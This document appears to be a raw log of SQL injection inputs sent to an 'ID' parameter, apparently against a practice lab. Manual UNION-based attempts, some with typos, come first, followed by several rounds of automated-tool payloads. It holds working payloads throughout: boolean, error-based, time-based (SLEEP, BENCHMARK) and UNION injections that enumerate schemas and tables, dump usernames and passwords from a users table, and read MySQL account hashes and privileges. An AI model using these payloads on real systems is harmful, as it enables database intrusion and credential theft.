ID:1
ID:1
ID:1'
ID:1' order by 3-- 
ID:1' order by 2-- 
ID:1' order by 5-- 
ID:1' order by 4-- 
ID:1' order by 3-- 
ID:1'
ID:1'
ID:1'order by 3-- 
ID:1'
ID:1' union select 1,2,3,4-- 
ID:1' union select 1,2,3,4 -- 
ID:1' union select 1,2,3 -- 
ID:1' union select 1,2,3 --  
ID:1' union select 1,2,3 --  
ID:1' union select 1,2,3 -- 
ID:-1' union select 1,2,3 -- 
ID:-1'
ID:-1'union select 1,2,3, 4-- 
ID:1'union select 1,2,3, 4-- 
ID:1'union select 1,2,3, 4 -- 
ID:1'union select 4-- 
ID:-1'union select 1,2,3, 4-- 
ID:-1'union select 1,2,3-- 
ID:-1'union select 1,444,3-- 
ID:-1'union select 1,555555,3-- 
ID:-1'union select 1555555,3-- 
ID:-1'union select 1,1555555,3-- 
ID:'1
ID:1'
ID:-1'order by 1，2，3 -- 
ID:-1'order by 1,2,3 -- 
ID:1'order by 1,2,3 -- 
ID:1'order by 3 -- 
ID:1'order by 4-- 
ID:1'order by 4-- 
ID:1' union selet 1,2,3-- 
ID:-1' union selet 1,2,3-- 
ID:-1' union select 1,2,3-- 
ID:-1' union select 1,database(),3-- 
ID:-1' union select 1,2,3-- 
ID:-1' union select 1,group_concat(taba_name) from information_schma.tables,3-- 
ID:-1' union select 1,group_concat(table_name) from information_schema.tables,3-- 
ID:-1' union select 1,group_concat(table_name) from information_schema.tables,3 -- 
ID:-1' union select 1,group_concat(table_name) ,3 from information_schema.tables -- 
ID:-1' union select 1,group_concat(table_name) ,database() from information_schema.tables -- 
ID:-1' union select 1,group_concat(table_name) ,database() from information_schema.tables where schema_table =database()-- 
ID:-1' union select 1,group_concat(table_name) ,database() from information_schema.tables where table_schema=database()-- 
ID:-1' union select 1,group_concat(table_name) ,database() from information_schema.tables -- 
ID:-1' union select 1,group_concat(table_name) ,database() from information_schema.tables  where table_schema=database()-- -- 
ID:-1' union select 1,group_concat(table_name) ,database() from information_schema.tables  where table_schema=database()-- -- 
ID:-1' union select 1,group_concat(table_name) ,database() from information_schema.tables- 
ID:-1' union select 1,group_concat(table_name) ,database() from information_schema.tables -- 
ID:-1' union select 1,group_concat(table_name) ,database() from information_schema.tables where table_schema=database() -- 
ID:-1' union select 1,group_concat(table_name) ,3from information_schema.tables where table_schema=database() -- 
ID:-1' union select 1,group_concat(table_name) ,3 from information_schema.tables where table_schema=database() -- 
ID:-1' union select 1,group_concat(colum_name) from information_schema,colums,3 where table_name='users'-- 
ID:-1' union select 1,group_concat(column_name) from information_schema,columns,3 where table_name='users'-- 
ID:-1' union select 1,group_concat(column_name), 3 from information_schema,columns, where table_name='users'-- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema,columns, where table_name='users'-- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema,columns where table_name='users'-- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'-- 
ID:-1' union select 1,2,3
ID:-1' union select 1,2,3 -- 
ID:-1' union select 1,group_concat(password) ,3 from -- 
ID:-1' union select 1,group_concat(password) ,3 from users-- 
ID:-1' union select 1,group_concat(password,user) ,3 from users-- 
ID:-1' union select 1,group_concat(password,use) ,3 from users-- 
ID:-1' union select 1,group_concat(password,user) ,3 from users-- 
ID:-1' union select 1,group_concat(password,users) ,3 from users-- 
ID:-1' union select 1,group_concat(password,username) ,3 from users-- 
ID:-1' union select 1,group_concat(password,0,username) ,3 from users-- 
ID:-1' union select 1,group_concat(password,0,username) ,3 from users-- 
ID:1
ID:1'
ID:1' order by 1,2,3,4
ID:1' order by 1 -- 
ID:1' order by 1,2,3,4 -- 
ID:1' order by 1,2,3,-- 
ID:1' order by 1,2,3 -- 
ID:-1' select 1,2,3 -- 
ID:-1' union select  1,2,3 -- 
ID:-1' union select  1,database(),3 -- 
ID:-1' union select  1,group_concat(taba_name),3 from information_schema -- 
ID:-1' union select  1,group_concat(table_name),3 from information_schema.tables -- 
ID:-1' union select  1,group_concat(table_name),3 from information_schema.tables where table_schema = database()-- 
ID:-1' union select  1,group_concat(column_name),3 from information_schema.columns where table_name = users-- 
ID:-1' union select  1,group_concat(column_name),3 from information_schema.columns where table_name = 'users' -- 
ID:-1' union select 1,group_concat(username,password) ,3 from users -- 
ID:-1' union select 1,group_concat(username,0**,password) ,3 from users -- 
ID:-1' union select 1,group_concat(username,0xx,password) ,3 from users -- 
ID:-1' union select 1,group_concat(username,x0x,password) ,3 from users -- 
ID:-1' union select 1,group_concat(username,888,password) ,3 from users -- 
ID:-1' union select 1,group_concat(username,0,password) ,3 from users -- 
ID:1
ID:1'
ID:2
ID:1
ID:1
ID:'1
ID:1'
ID:1
ID:1
ID:-1'
ID:-1' union select 1,group_concat(password,user) ,3 from users-- 
ID:-1'
ID:-1
ID:1
ID:1,order by 1,2,3 -- 
ID:-1,order by 1,2,3 -- 
ID:-1',order by 1,2,3 -- 
ID:1,order by 1,2,3 -- 
ID:-1' union select 1,2,3 -- 
ID:-1' union select 1,database(),3 -- 
ID:-1' union select 1,group_concat(table_name) ,3 from information_schema.tables where table_schema=database() -- 
ID:-1'
ID:-1'
ID:1'
ID:1
ID:1'
ID:1
ID:1'
ID:1'
ID:1
ID:1
ID:1'
ID:1' order by 3
ID:1' order by 3 -- 
ID:-1' union select 1,2,3 -- 
ID:-1' union select 1,database(),3 -- 
ID:1
ID:1'
ID:1' order by 3
ID:1' order by 3 -- 
ID:1' order by 4 -- 
ID:1
ID:1
ID:1'
ID:1
ID:1
ID:1 and 1=1
ID:1 and 1 = 2
ID:1' and 1 = 2
ID:1' order by 3 
ID:1' order by 3 -- 
ID:1
ID:1 and 1=2
ID:1'
ID:") or 1=1 order by 3 -- 
ID:1") and 1=1 order by 3 -- 
ID:1
ID:1
ID:4021
ID:1'),.(.)"(.
ID:1'mFFmAf<'">RvQFqa
ID:1) AND 8931=2592 AND (6589=6589
ID:1) AND 3906=3906 AND (7275=7275
ID:1 AND 5479=3431
ID:1 AND 3906=3906
ID:1 AND 4040=8239-- BNZX
ID:1 AND 3906=3906-- dRct
ID:1') AND 3811=7970 AND ('oNkt'='oNkt
ID:1') AND 3906=3906 AND ('OkAP'='OkAP
ID:1' AND 1450=3328 AND 'DCCJ'='DCCJ
ID:1' AND 3906=3906 AND 'wdbY'='wdbY
ID:1' AND 9187=5117 AND 'TtCF'='TtCF
ID:(SELECT CONCAT(CONCAT(0x7171787071,(CASE WHEN (1473=1473) THEN 0x31 ELSE 0x30 END)),0x7178707171))
ID:1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171787071,(SELECT (ELT(5811=5811,1))),0x7178707171,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'WypB'='WypB
ID:1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171787071,(SELECT (ELT(2938=2938,1))),0x7178707171,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'PUYQ'='PUYQ
ID:1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7171787071,(SELECT (ELT(8446=8446,1))),0x7178707171,0x78))x)) AND 'djET'='djET
ID:1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7171787071,(SELECT (ELT(4548=4548,1))),0x7178707171,0x78))x)) AND 'erAh'='erAh
ID:1' AND GTID_SUBSET(CONCAT(0x7171787071,(SELECT (ELT(8717=8717,1))),0x7178707171),8717) AND 'QIlU'='QIlU
ID:(SELECT CONCAT(0x7171787071,(ELT(1872=1872,1)),0x7178707171))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1';SELECT SLEEP(5)#
ID:1';SELECT SLEEP(5) AND 'uJub'='uJub
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))czsm)#
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))Smjz) AND 'oPIj'='oPIj
ID:1';SELECT BENCHMARK(5000000,MD5(0x6f756b72))#
ID:1';SELECT BENCHMARK(5000000,MD5(0x43747977)) AND 'dTKu'='dTKu
ID:1' AND (SELECT 6909 FROM (SELECT(SLEEP(5)))dwJL) AND 'MRoE'='MRoE
ID:1' AND (SELECT 6909 FROM (SELECT(SLEEP(0)))dwJL) AND 'MRoE'='MRoE
ID:1' AND (SELECT 6909 FROM (SELECT(SLEEP(5)))dwJL) AND 'MRoE'='MRoE
ID:1' ORDER BY 1-- -
ID:1' ORDER BY 2452-- -
ID:1' ORDER BY 10-- -
ID:1' ORDER BY 6-- -
ID:1' ORDER BY 4-- -
ID:1' ORDER BY 3-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7171787071,0x4e7a526e63416f594d65516342486b75456b66595a595370546c61675748717546456d6571677549,0x7178707171),NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7171787071,0x6a6d4b6462445649626c646a68614b417a676448506d534a6c7a78434543694f4c7045636d545958,0x7178707171)-- -
ID:1' UNION ALL SELECT CONCAT(0x7171787071,0x414b646e587a656d4b6c4a58707251754441546b796a787863644b78646c5a6a546d5a526669784e,0x7178707171),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7171787071,0x746b586c796f6f786e4a,0x7178707171),NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7171787071,0x51656c6a554146506641,0x7178707171)-- -
ID:1' UNION ALL SELECT CONCAT(0x7171787071,0x755352667041794f5752,0x7178707171),NULL,NULL-- -
ID:-2790' UNION ALL SELECT NULL,NULL,CONCAT(0x7171787071,0x7a484773536f716b485964686364646363666a6c467565434f5a70777276596c4873726e55476152,0x7178707171)-- -
ID:-3754' UNION ALL SELECT NULL,NULL,CONCAT(0x7171787071,(CASE WHEN (5126=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5126) THEN 1 ELSE 0 END),0x7178707171)-- -
ID:-9349' UNION ALL SELECT NULL,NULL,CONCAT(0x7171787071,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x7178707171)-- -
ID:-6926' UNION ALL SELECT NULL,NULL,CONCAT(0x7171787071,(CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END),0x7178707171)-- -
ID:-6491' UNION ALL SELECT NULL,NULL,CONCAT(0x7171787071,(CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END),0x7178707171)-- -
ID:-4050' UNION ALL SELECT NULL,NULL,CONCAT(0x7171787071,(CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END),0x7178707171)-- -
ID:-2413' UNION ALL SELECT NULL,NULL,CONCAT(0x7171787071,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x7178707171)-- -
ID:-1368' UNION ALL SELECT NULL,NULL,CONCAT(0x7171787071,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x7178707171)-- -
ID:-5395' UNION ALL SELECT NULL,NULL,CONCAT(0x7171787071,JSON_ARRAYAGG(CONCAT_WS(0x71667972746d,schema_name)),0x7178707171) FROM INFORMATION_SCHEMA.SCHEMATA-- -
ID:1
ID:1'
ID:1' -- 
ID:1'
ID:1'
ID:1
ID:1'
ID:1'
ID:1'
ID:1
ID:1'
ID:1
ID:1'
ID:1'  1 and 1
ID:1'  1 and=1
ID:1'
ID:1'  1 and=1
ID:1'
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:6815
ID:1,."',(...(
ID:1'BQLWZu<'">InVmiY
ID:1) AND 1129=7865 AND (2351=2351
ID:1) AND 5004=5004 AND (6009=6009
ID:1 AND 1601=9113
ID:1 AND 5004=5004
ID:1 AND 5638=2000-- eUCz
ID:1 AND 5004=5004-- HWwV
ID:1') AND 6999=6913 AND ('ShFf'='ShFf
ID:1') AND 5004=5004 AND ('jjoc'='jjoc
ID:1' AND 3411=5941 AND 'RsGw'='RsGw
ID:1' AND 5004=5004 AND 'gxSk'='gxSk
ID:1' AND 5250=7559 AND 'FLan'='FLan
ID:(SELECT CONCAT(CONCAT(0x71707a7871,(CASE WHEN (6428=6428) THEN 0x31 ELSE 0x30 END)),0x71707a6b71))
ID:1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71707a7871,(SELECT (ELT(7721=7721,1))),0x71707a6b71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'tUXa'='tUXa
ID:1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71707a7871,(SELECT (ELT(2613=2613,1))),0x71707a6b71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'IvYr'='IvYr
ID:1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x71707a7871,(SELECT (ELT(1993=1993,1))),0x71707a6b71,0x78))x)) AND 'QijH'='QijH
ID:1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x71707a7871,(SELECT (ELT(4446=4446,1))),0x71707a6b71,0x78))x)) AND 'sEQK'='sEQK
ID:1' AND GTID_SUBSET(CONCAT(0x71707a7871,(SELECT (ELT(1320=1320,1))),0x71707a6b71),1320) AND 'LqRR'='LqRR
ID:(SELECT CONCAT(0x71707a7871,(ELT(1674=1674,1)),0x71707a6b71))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1';SELECT SLEEP(5)#
ID:1';SELECT SLEEP(5) AND 'Gtnu'='Gtnu
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))iYiK)#
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))lgKF) AND 'flDO'='flDO
ID:1';SELECT BENCHMARK(5000000,MD5(0x5a736943))#
ID:1';SELECT BENCHMARK(5000000,MD5(0x6d43725a)) AND 'BvjE'='BvjE
ID:1' AND (SELECT 7893 FROM (SELECT(SLEEP(5)))wAzJ) AND 'VwGy'='VwGy
ID:1' AND (SELECT 7893 FROM (SELECT(SLEEP(0)))wAzJ) AND 'VwGy'='VwGy
ID:1' AND (SELECT 7893 FROM (SELECT(SLEEP(5)))wAzJ) AND 'VwGy'='VwGy
ID:1' ORDER BY 1-- -
ID:1' ORDER BY 2426-- -
ID:1' ORDER BY 10-- -
ID:1' ORDER BY 6-- -
ID:1' ORDER BY 4-- -
ID:1' ORDER BY 3-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x71707a7871,0x50506e796e77577665546b6d504f65436b776a7a41716a6a7767714178435951716253576a54634c,0x71707a6b71),NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7871,0x4e78614a644a75524c6f574d58756b46747a4d775a6a484e427950466f77574b677146476445556a,0x71707a6b71)-- -
ID:1' UNION ALL SELECT CONCAT(0x71707a7871,0x6d666348477a77536b4d796673726744665a48516d6678417049767a727352575a6d474850577655,0x71707a6b71),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x71707a7871,0x49784a6a6a58757a4752,0x71707a6b71),NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7871,0x4d437873554a614e6b69,0x71707a6b71)-- -
ID:1' UNION ALL SELECT CONCAT(0x71707a7871,0x7769536457645653504f,0x71707a6b71),NULL,NULL-- -
ID:-7826' UNION ALL SELECT CONCAT(0x71707a7871,0x5554706b4e47466168704a446a6577625045654a494c6b465a6670564366666f4968424244565056,0x71707a6b71),NULL,NULL-- -
ID:-7876' UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7871,0x5a48617474475a646f4b526f4f515a49737148796b444e6a724459796a727574725443714e636f62,0x71707a6b71)-- -
ID:-1553' UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7871,(CASE WHEN (4324=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4324) THEN 1 ELSE 0 END),0x71707a6b71)-- -
ID:-5539' UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7871,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x71707a6b71)-- -
ID:-6967' UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7871,(CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END),0x71707a6b71)-- -
ID:-8065' UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7871,(CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END),0x71707a6b71)-- -
ID:-9223' UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7871,(CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END),0x71707a6b71)-- -
ID:-1605' UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7871,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x71707a6b71)-- -
ID:-6129' UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7871,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x71707a6b71)-- -
ID:-2982' UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7871,JSON_ARRAYAGG(CONCAT_WS(0x7a7761717263,schema_name)),0x71707a6b71) FROM INFORMATION_SCHEMA.SCHEMATA-- -
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:-3238' UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7871,JSON_ARRAYAGG(CONCAT_WS(0x7a7761717263,table_name)),0x71707a6b71) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479)-- -
ID:1
ID:-3107' UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7871,JSON_ARRAYAGG(CONCAT_WS(0x7a7761717263,column_name,column_type)),0x71707a6b71) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479-- -
ID:1
ID:-8372' UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7871,JSON_ARRAYAGG(CONCAT_WS(0x7a7761717263,column_name,column_type)),0x71707a6b71) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 AND (column_name=0x70617373776f7264 OR column_name=0x757365726e616d65)-- -
ID:-1989' UNION ALL SELECT NULL,NULL,CONCAT(0x71707a7871,JSON_ARRAYAGG(CONCAT_WS(0x7a7761717263,`password`,username)),0x71707a6b71) FROM `security`.users-- -
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:7794
ID:1.).'(",.),
ID:1'bcQpis<'">ynuQtB
ID:1) AND 9413=2428 AND (1186=1186
ID:1) AND 6860=6860 AND (7127=7127
ID:1 AND 5390=9745
ID:1 AND 6860=6860
ID:1 AND 3140=6048-- ipLW
ID:1 AND 6860=6860-- orDo
ID:1') AND 9192=3703 AND ('rEKi'='rEKi
ID:1') AND 6860=6860 AND ('GgFu'='GgFu
ID:1' AND 8814=8093 AND 'VvIt'='VvIt
ID:1' AND 6860=6860 AND 'PiMt'='PiMt
ID:1' AND 7935=9759 AND 'lxFP'='lxFP
ID:(SELECT CONCAT(CONCAT(0x7162767871,(CASE WHEN (3701=3701) THEN 0x31 ELSE 0x30 END)),0x716b717071))
ID:1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162767871,(SELECT (ELT(9692=9692,1))),0x716b717071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'WHxb'='WHxb
ID:1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162767871,(SELECT (ELT(9427=9427,1))),0x716b717071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'CGjk'='CGjk
ID:1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162767871,(SELECT (ELT(5240=5240,1))),0x716b717071,0x78))x)) AND 'wwRK'='wwRK
ID:1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162767871,(SELECT (ELT(4605=4605,1))),0x716b717071,0x78))x)) AND 'cYkY'='cYkY
ID:1' AND GTID_SUBSET(CONCAT(0x7162767871,(SELECT (ELT(9199=9199,1))),0x716b717071),9199) AND 'QwhE'='QwhE
ID:(SELECT CONCAT(0x7162767871,(ELT(8995=8995,1)),0x716b717071))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1';SELECT SLEEP(5)#
ID:1';SELECT SLEEP(5) AND 'BuXj'='BuXj
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))MQsH)#
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))pJJj) AND 'fotD'='fotD
ID:1';SELECT BENCHMARK(5000000,MD5(0x52596e6c))#
ID:1';SELECT BENCHMARK(5000000,MD5(0x696e6f78)) AND 'lJao'='lJao
ID:1' AND (SELECT 3464 FROM (SELECT(SLEEP(5)))jiZA) AND 'UIeR'='UIeR
ID:1' AND (SELECT 3464 FROM (SELECT(SLEEP(0)))jiZA) AND 'UIeR'='UIeR
ID:1' AND (SELECT 3464 FROM (SELECT(SLEEP(5)))jiZA) AND 'UIeR'='UIeR
ID:1' ORDER BY 1-- -
ID:1' ORDER BY 3210-- -
ID:1' ORDER BY 10-- -
ID:1' ORDER BY 6-- -
ID:1' ORDER BY 4-- -
ID:1' ORDER BY 3-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7162767871,0x444b554a7272546d77465955796d59414a7142576d75716b5965654d544743474a4f6f457749676b,0x716b717071),NULL-- -
ID:1' UNION ALL SELECT CONCAT(0x7162767871,0x73436f5873444c684c526c53777868416f51646f79646350696a5863647a756f5070527769647550,0x716b717071),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767871,0x79744150586e75714d716d4f74684b7446714a594857707967704663587059685465624554644754,0x716b717071)-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7162767871,0x6257634b6348594b5a41,0x716b717071),NULL-- -
ID:1' UNION ALL SELECT CONCAT(0x7162767871,0x73426556476746704d73,0x716b717071),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767871,0x74467664757373776b4f,0x716b717071)-- -
ID:-3692' UNION ALL SELECT NULL,CONCAT(0x7162767871,0x67557755456e4d6c7a58774475724a487a75647549414f4f6a6c6141474c577a7652467a69757455,0x716b717071),NULL-- -
ID:-7573' UNION ALL SELECT NULL,CONCAT(0x7162767871,(CASE WHEN (4662=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4662) THEN 1 ELSE 0 END),0x716b717071),NULL-- -
ID:-3480' UNION ALL SELECT NULL,CONCAT(0x7162767871,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x716b717071),NULL-- -
ID:-4197' UNION ALL SELECT NULL,CONCAT(0x7162767871,(CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END),0x716b717071),NULL-- -
ID:-5079' UNION ALL SELECT NULL,CONCAT(0x7162767871,(CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END),0x716b717071),NULL-- -
ID:-8170' UNION ALL SELECT NULL,CONCAT(0x7162767871,(CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END),0x716b717071),NULL-- -
ID:-9937' UNION ALL SELECT NULL,CONCAT(0x7162767871,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x716b717071),NULL-- -
ID:-1634' UNION ALL SELECT NULL,CONCAT(0x7162767871,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x716b717071),NULL-- -
ID:-9307' UNION ALL SELECT NULL,CONCAT(0x7162767871,JSON_ARRAYAGG(CONCAT_WS(0x727874736e6c,grantee)),0x716b717071),NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES-- -
ID:1
ID:-6705' UNION ALL SELECT NULL,CONCAT(0x7162767871,JSON_ARRAYAGG(CONCAT_WS(0x727874736e6c,user,authentication_string)),0x716b717071),NULL FROM mysql.user-- -
ID:1
ID:1
ID:-3729' UNION ALL SELECT NULL,CONCAT(0x7162767871,IFNULL(CAST(DATABASE() AS NCHAR),0x20),0x716b717071),NULL-- -
ID:1
ID:-6977' UNION ALL SELECT NULL,CONCAT(0x7162767871,IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20),0x716b717071),NULL-- -
ID:1
ID:-7834' UNION ALL SELECT NULL,CONCAT(0x7162767871,JSON_ARRAYAGG(CONCAT_WS(0x727874736e6c,(CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=0x726f6f74 LIMIT 0,1)=0x59) THEN 1 ELSE 0 END))),0x716b717071),NULL-- -
ID:1
ID:-4919' UNION ALL SELECT NULL,CONCAT(0x7162767871,JSON_ARRAYAGG(CONCAT_WS(0x727874736e6c,grantee,privilege_type)),0x716b717071),NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES-- -
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:4761
ID:1,,(.()"',.
ID:1'TSRxjw<'">VLCvQG
ID:1) AND 9724=1196 AND (4530=4530
ID:1) AND 6142=6142 AND (1190=1190
ID:1 AND 9281=1350
ID:1 AND 6142=6142
ID:1 AND 4796=4531-- mmBU
ID:1 AND 6142=6142-- JtUQ
ID:1') AND 1060=5083 AND ('PIUf'='PIUf
ID:1') AND 6142=6142 AND ('oLRK'='oLRK
ID:1' AND 6482=5832 AND 'IFOP'='IFOP
ID:1' AND 6142=6142 AND 'oaqA'='oaqA
ID:1' AND 3435=2627 AND 'rwRf'='rwRf
ID:(SELECT CONCAT(CONCAT(0x716a6a6b71,(CASE WHEN (7887=7887) THEN 0x31 ELSE 0x30 END)),0x7162786b71))
ID:1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a6a6b71,(SELECT (ELT(8214=8214,1))),0x7162786b71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'wowB'='wowB
ID:1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a6a6b71,(SELECT (ELT(4847=4847,1))),0x7162786b71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'NZKF'='NZKF
ID:1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x716a6a6b71,(SELECT (ELT(2258=2258,1))),0x7162786b71,0x78))x)) AND 'KGDt'='KGDt
ID:1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x716a6a6b71,(SELECT (ELT(9649=9649,1))),0x7162786b71,0x78))x)) AND 'tzZw'='tzZw
ID:1' AND GTID_SUBSET(CONCAT(0x716a6a6b71,(SELECT (ELT(5058=5058,1))),0x7162786b71),5058) AND 'VDeA'='VDeA
ID:(SELECT CONCAT(0x716a6a6b71,(ELT(2652=2652,1)),0x7162786b71))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1';SELECT SLEEP(5)#
ID:1';SELECT SLEEP(5) AND 'zsPI'='zsPI
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))djvn)#
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))bAqC) AND 'beWW'='beWW
ID:1';SELECT BENCHMARK(5000000,MD5(0x7671516b))#
ID:1';SELECT BENCHMARK(5000000,MD5(0x714b476d)) AND 'yuuT'='yuuT
ID:1' AND (SELECT 3085 FROM (SELECT(SLEEP(5)))bHfK) AND 'uGiW'='uGiW
ID:1' AND (SELECT 3085 FROM (SELECT(SLEEP(0)))bHfK) AND 'uGiW'='uGiW
ID:1' AND (SELECT 3085 FROM (SELECT(SLEEP(5)))bHfK) AND 'uGiW'='uGiW
ID:1' ORDER BY 1-- -
ID:1' ORDER BY 1822-- -
ID:1' ORDER BY 10-- -
ID:1' ORDER BY 6-- -
ID:1' ORDER BY 4-- -
ID:1' ORDER BY 3-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x716a6a6b71,0x77664c77764e454641707959556978456e71564567654c7a4c7753476e47656b6955695478517671,0x7162786b71),NULL-- -
ID:1' UNION ALL SELECT CONCAT(0x716a6a6b71,0x69626f425a4e587351506b4668586f7a6c70775258574b6d486c4479496f6c64537655664f656454,0x7162786b71),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x716a6a6b71,0x4478564646634d4f7372657671695742535658434f784a6844567a4e45466872674e6659546e596d,0x7162786b71)-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x716a6a6b71,0x43694c6d44755a717052,0x7162786b71),NULL-- -
ID:1' UNION ALL SELECT CONCAT(0x716a6a6b71,0x6341646453526f42664b,0x7162786b71),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x716a6a6b71,0x536f6157715a6745724c,0x7162786b71)-- -
ID:-7370' UNION ALL SELECT NULL,CONCAT(0x716a6a6b71,0x52545561417252644149436f474773744f426f757276425a6a526a446c495478756446775062556c,0x7162786b71),NULL-- -
ID:-2564' UNION ALL SELECT NULL,CONCAT(0x716a6a6b71,(CASE WHEN (9859=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                9859) THEN 1 ELSE 0 END),0x7162786b71),NULL-- -
ID:-6517' UNION ALL SELECT NULL,CONCAT(0x716a6a6b71,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x7162786b71),NULL-- -
